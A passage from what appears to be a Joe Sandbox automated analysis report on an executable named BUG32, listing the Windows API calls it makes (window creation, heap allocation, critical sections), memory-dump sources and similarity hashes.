                            • SetBkColor.GDI32(?,00000000), ref: 00407C87
                            • GetSysColorBrush.USER32(0000000F), ref: 00407C8B
                            • SetBkColor.GDI32(?,?), ref: 00407C9D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Color$BrushText
                            • String ID:
                            • API String ID: 3324192670-0
                            • Opcode ID: 78d8ddbb8140ec478147b1cf6a8a812e299454e47b1c99c539d87967655fb9e9
                            • Instruction ID: 1479e74b6b878419e50feb36e404bf2b56aba1661c4ea75756eeb89b19e83d15
                            • Opcode Fuzzy Hash: 78d8ddbb8140ec478147b1cf6a8a812e299454e47b1c99c539d87967655fb9e9
                            • Instruction Fuzzy Hash: 71F08171504704ABD2209F69AD88867B3ACEB94731F000B36F525E3AE2D774AC098A76
                            APIs
                            • memset.MSVCRT ref: 00407FA6
                            • CreateWindowExA.USER32(00000008,Edit,00000000,00000008,00001000,00000000,00000007,0040F1F8,00000000,000000FF,00000000), ref: 00408052
                            • SetWindowLongA.USER32(00000000,000000FC,00407E58), ref: 00408076
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Window$CreateLongmemset
                            • String ID: Edit
                            • API String ID: 2917088559-554135844
                            • Opcode ID: 4593270f2d0dbd3331fef35d57592261c1d87eb21295ffe5f91014d05b712222
                            • Instruction ID: dfd80494d6c268a62c2d00364cbc1a665e7c62e2c007c049c1a1815936996747
                            • Opcode Fuzzy Hash: 4593270f2d0dbd3331fef35d57592261c1d87eb21295ffe5f91014d05b712222
                            • Instruction Fuzzy Hash: 00218271500309AFDB205F15ED89B863EA5FB84364F10863EFA54662E1C7FA9894CF5C
                            APIs
                              • Part of subcall function 0040D090: HeapReAlloc.KERNEL32(026C0000,00000000,026C0780,000040FF,00000000,00000000), ref: 0040D0D7
                            • GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00000000,?,?,00000000,00401A1C,00000000,00000000,00000800,00410310,00000800,00000000,00000000,00000001), ref: 0040746E
                            • strcmp.MSVCRT ref: 0040747C
                            • memmove.MSVCRT ref: 00407490
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: AllocFileHeapModuleNamememmovestrcmp
                            • String ID: \\?\
                            • API String ID: 1948962972-4282027825
                            • Opcode ID: e7117fefb694c0edd10b27711608e2ea908b4cd3a87c5928d1610d83e3619dfc
                            • Instruction ID: b86b2d91e576812bf515aa42f6eab0602cb8b9553751092c7dc71a5c1fd3b720
                            • Opcode Fuzzy Hash: e7117fefb694c0edd10b27711608e2ea908b4cd3a87c5928d1610d83e3619dfc
                            • Instruction Fuzzy Hash: 12F0ECF39017117AD320A6B6EC49E9B7F8DDF85368F100437F504A2182DA7D991882B9
                            APIs
                            • EnterCriticalSection.KERNEL32(004105D8,004105F0,0040C482,76EC5E70,00000000,004105D0,?,?,0040B181,0040ABC2,00000010,00010000,00000004,00000400), ref: 0040C4D9
                            • HeapAlloc.KERNEL32(00000000,00000018,?,?,0040B181,0040ABC2,00000010,00010000,00000004,00000400,?,?,0040ACA0,00000008,00000007), ref: 0040C511
                            • LeaveCriticalSection.KERNEL32(004105D8,?,?,0040B181,0040ABC2,00000010,00010000,00000004,00000400,?,?,0040ACA0,00000008,00000007), ref: 0040C571
                            • HeapAlloc.KERNEL32(00000000,00000038,76EC5E70,00000000,004105D0,?,?,0040B181,0040ABC2,00000010,00010000,00000004,00000400,?,?,0040ACA0), ref: 0040C584
                            • InitializeCriticalSection.KERNEL32(00000020,?,?,0040B181,0040ABC2,00000010,00010000,00000004,00000400,?,?,0040ACA0,00000008,00000007), ref: 0040C5B7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: CriticalSection$AllocHeap$EnterInitializeLeave
                            • String ID:
                            • API String ID: 2544007295-0
                            • Opcode ID: f525dda11cb0040cc28c6c5eb1002b4f30927f43aefa2c0779f6b591889f35e8
                            • Instruction ID: 604706d00066b6616072beca016f9f5222b77d2b8465cf307c4f4fb53d3e6ec4
                            • Opcode Fuzzy Hash: f525dda11cb0040cc28c6c5eb1002b4f30927f43aefa2c0779f6b591889f35e8
                            • Instruction Fuzzy Hash: D5415EB5600615EFC720CF28DD84A56BBE5FB08710B148A3BF846E7390D774E9418F58
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: CharLower
                            • String ID:
                            • API String ID: 1615517891-0
                            • Opcode ID: 6f746d287f783955bb98d0c645657746f07eb73645d7bbb55da592f70926d53f
                            • Instruction ID: ab9c7395d4ed88f474929f87b13470e90fa4e11724c6b9dee4fd66c0bdb52a4a
                            • Opcode Fuzzy Hash: 6f746d287f783955bb98d0c645657746f07eb73645d7bbb55da592f70926d53f
                            • Instruction Fuzzy Hash: 652105A52483114BC610DF2D54105B7FBF4D9C52B0B4C04ABE9C4A7352D53AE90E97A9
                            APIs
                            • HeapAlloc.KERNEL32(00000000,00000006,?,00000000,?,?,?,00401533,00000000,0000000D,00000004,00000003,0000003D,0000004B,0000004E,00000014), ref: 00408C73
                            • DestroyAcceleratorTable.USER32(?), ref: 00408CE1
                            • CreateAcceleratorTableA.USER32(?,?,00000000,?,?,?,00401533,00000000,0000000D,00000004,00000003,0000003D,0000004B,0000004E,00000014,0040F1CE), ref: 00408CED
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: AcceleratorTable$AllocCreateDestroyHeap
                            • String ID:
                            • API String ID: 1117254962-0
                            • Opcode ID: 5a4b2372e625f47779b1248dede1e0e99c6403df7903c70137cbcfedfd4fcbdf
                            • Instruction ID: affc00136c37a94e8e43a2b706806032cfc4f769f917c8fb3dd16b27a6743d0f
                            • Opcode Fuzzy Hash: 5a4b2372e625f47779b1248dede1e0e99c6403df7903c70137cbcfedfd4fcbdf
                            • Instruction Fuzzy Hash: 91318F30105701DBDB34DF24CA45AAABBB1FF54300F00C93EE89AAB6A0D775EA55DB14
                            APIs
                            • IsWindowEnabled.USER32(?), ref: 00409526
                            • IsWindowVisible.USER32(?), ref: 00409531
                            • GetWindowLongA.USER32(?,000000F0), ref: 0040953E
                            • SetFocus.USER32(?), ref: 0040955C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Window$EnabledFocusLongVisible
                            • String ID:
                            • API String ID: 599048109-0
                            • Opcode ID: d1eba3e5ea2827f80eeb22698f6188cd17cff088cbcb0a31b06682ee0d210fea
                            • Instruction ID: b54800a604a23dd3b8520b0d2974d334c7cfaef32e169ef20a884e25457352a4
                            • Opcode Fuzzy Hash: d1eba3e5ea2827f80eeb22698f6188cd17cff088cbcb0a31b06682ee0d210fea
                            • Instruction Fuzzy Hash: 9BF054722043016BD7219F379D88A1BB79CFB847A2704883AF495F3691C734DC45CB28
                            APIs
                            • InitializeCriticalSection.KERNEL32(00410694,?,?,?,00401080,00000000,00001000,00000000,00000000), ref: 00407ACB
                            • GetStockObject.GDI32(00000011), ref: 00407AD3
                              • Part of subcall function 0040C40A: HeapAlloc.KERNEL32(00000008,00000020,?,?,0040A70E,00000018,00000010,0040A680,0040105D,00000000,00001000,00000000,00000000), ref: 0040C41C
                              • Part of subcall function 0040C40A: HeapAlloc.KERNEL32(00000008,00000000,?,?,0040A70E,00000018,00000010,0040A680,0040105D,00000000,00001000,00000000), ref: 0040C447
                              • Part of subcall function 0040C45A: HeapAlloc.KERNEL32(00000008,0040ABCA,00000000,0040AC87,00000028,0040ABCA,0040ABE7), ref: 0040C467
                            • memset.MSVCRT ref: 00407B0F
                            • InitCommonControlsEx.COMCTL32(00000000,00001000), ref: 00407B29
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: AllocHeap$CommonControlsCriticalInitInitializeObjectSectionStockmemset
                            • String ID:
                            • API String ID: 3863164924-0
                            • Opcode ID: 82026debede21546c336ad563e7219969d917284e9b78de2335e9ed30540dc3d
                            • Instruction ID: c0dc9ce726484f3923f1b1ffcdbe8eec6e94680a47d2b7f95252595e321a9b4c
                            • Opcode Fuzzy Hash: 82026debede21546c336ad563e7219969d917284e9b78de2335e9ed30540dc3d
                            • Instruction Fuzzy Hash: FAF054B1A80308BEE740EFE0EC1BF9D3B68B740B05F10813AB201B61D1DBF952448B59
                            APIs
                            • memset.MSVCRT ref: 00407CDF
                            • CreateWindowExA.USER32(00000008,Static,00000000,00000008,00001000,00000000,00000007,0040F1F8,00000000,000000FF,00000000), ref: 00407D6B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: CreateWindowmemset
                            • String ID: Static
                            • API String ID: 1730425660-2272013587
                            • Opcode ID: 53e443b3fada223124d2a93a17ea38f4f466f6b1112d3c97f95cbc20585fcc95
                            • Instruction ID: bdd26c0e7b72ea229a325c3fed8bf4bbd8547f5aae066c6f0b9da5616d29063d
                            • Opcode Fuzzy Hash: 53e443b3fada223124d2a93a17ea38f4f466f6b1112d3c97f95cbc20585fcc95
                            • Instruction Fuzzy Hash: 0B218E71540219AFDB204F01EC49F967FA8FB55728F00833AF924662F1C7F998A19B9D
                            APIs
                            • memset.MSVCRT ref: 004081E8
                            • CreateWindowExA.USER32(00000000,Button,00000000,00000008,00001000,00000000,00000007,0040F1F8,00000000,000000FF,00000000), ref: 00408259
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: CreateWindowmemset
                            • String ID: Button
                            • API String ID: 1730425660-1034594571
                            • Opcode ID: 66d371b3719807fef16c6e92e9a2da39cd79906fd48a34173bce1decb7867b01
                            • Instruction ID: a5636c02ea9e895c508a6d5c25f5bc7baeefe6715dcdd9288c0f9465b57479de
                            • Opcode Fuzzy Hash: 66d371b3719807fef16c6e92e9a2da39cd79906fd48a34173bce1decb7867b01
                            • Instruction Fuzzy Hash: F811AFB1500219FFDF109F95ED84D9A3FA9EB08354B10813EFA58A3260D7B988A0DF58
                            APIs
                            • GetPropA.USER32(00000000,PB_ID), ref: 00408E07
                            • GetWindowLongA.USER32(00000000,000000F4), ref: 00408E14
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: LongPropWindow
                            • String ID: PB_ID
                            • API String ID: 2492497586-4173770792
                            • Opcode ID: 035cb0324ac32b5b9af4aa7161a6db2fcd31282d099c44d426bc7c78b5f5ec72
                            • Instruction ID: eaf142f532c33e184f186e18e9f29863e29270e528d83a2ee9ec1ffe05a84728
                            • Opcode Fuzzy Hash: 035cb0324ac32b5b9af4aa7161a6db2fcd31282d099c44d426bc7c78b5f5ec72
                            • Instruction Fuzzy Hash: ABF06232100104ABCF155F95DD04E5B3F65AB44360B14413AF90DF22B0CA79CC61DB88
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: ParentProp
                            • String ID: PB_WindowID
                            • API String ID: 919147419-1508741625
                            • Opcode ID: 590728b32ffb76da121b675b6ced36404592213f36ec982ae717a0376ce8925b
                            • Instruction ID: 35f19546897a564662fda3e47cf325dd75d41532f3e80009bf92af9d81012baa
                            • Opcode Fuzzy Hash: 590728b32ffb76da121b675b6ced36404592213f36ec982ae717a0376ce8925b
                            • Instruction Fuzzy Hash: 49D0C2327012213BC230561A9D88D4BAA8CAEA86B1300043BF644F3250C678D80092AD
                            APIs
                              • Part of subcall function 00408548: GetParent.USER32(?), ref: 0040856B
                            • GetPropA.USER32(00000000,?), ref: 0040858E
                            • GetWindowLongA.USER32(?,000000F4), ref: 0040859C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: LongParentPropWindow
                            • String ID: PB_WindowID
                            • API String ID: 1999142876-1508741625
                            • Opcode ID: 27bc7b8659973c88992da4a96471f625a406adac4159826eb1f9ea6e9dc17ebc
                            • Instruction ID: 4f6abc2c382ba07471c904d8ef8ccac696f4e6d27467060f11dfdd69e0947d55
                            • Opcode Fuzzy Hash: 27bc7b8659973c88992da4a96471f625a406adac4159826eb1f9ea6e9dc17ebc
                            • Instruction Fuzzy Hash: 67D05E71588300BFEB013B60CD09C3E7A18FB60355B104939B864A00F0CB398524A726
                            APIs
                            • HeapAlloc.KERNEL32(00C40000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040F021), ref: 00404936
                            • strncpy.MSVCRT ref: 0040497E
                            • strncpy.MSVCRT ref: 004049CE
                            • HeapFree.KERNEL32(00C40000,00000000,00000000), ref: 004049F3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Heapstrncpy$AllocFree
                            • String ID:
                            • API String ID: 2298710462-0
                            • Opcode ID: 5352260905f33035ebe7ed82f0a5b9096b055188dc82da8aba8b3d66dab65ad1
                            • Instruction ID: 09abf4f111ad8656cb036d755086867d576e1856a31125ab878b0ba337ffef26
                            • Opcode Fuzzy Hash: 5352260905f33035ebe7ed82f0a5b9096b055188dc82da8aba8b3d66dab65ad1
                            • Instruction Fuzzy Hash: 9551E4B19083419FC3119F69888476BBBE4AFC9304F184A3DF984A7391D779DD09CB9A
                            APIs
                            • EnterCriticalSection.KERNEL32(00000001,?,?,00C449C0,?,?,0040781C,?,?,?,?,00402A23,00000001,00000001,?,?), ref: 0040C5E3
                            • HeapAlloc.KERNEL32(00000000,-00000018,?,?,00C449C0,?,?,0040781C,?,?,?,?,00402A23,00000001,00000001,?), ref: 0040C697
                            • HeapAlloc.KERNEL32(00000000,-00000018,?,?,00C449C0,?,?,0040781C,?,?,?,?,00402A23,00000001,00000001,?), ref: 0040C6B7
                            • LeaveCriticalSection.KERNEL32(?,?,?,00C449C0,?,?,0040781C,?,?,?,?,00402A23,00000001,00000001), ref: 0040C70F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: AllocCriticalHeapSection$EnterLeave
                            • String ID:
                            • API String ID: 830345296-0
                            • Opcode ID: 7c2fee1621edae99f84a989a42f1e2331250d191d6b0508ab805d5e3736e75c5
                            • Instruction ID: 7a03a061487a91abc448c1b4b59b99aec52ecdb272e7e9a029a70a5fabb4cc1a
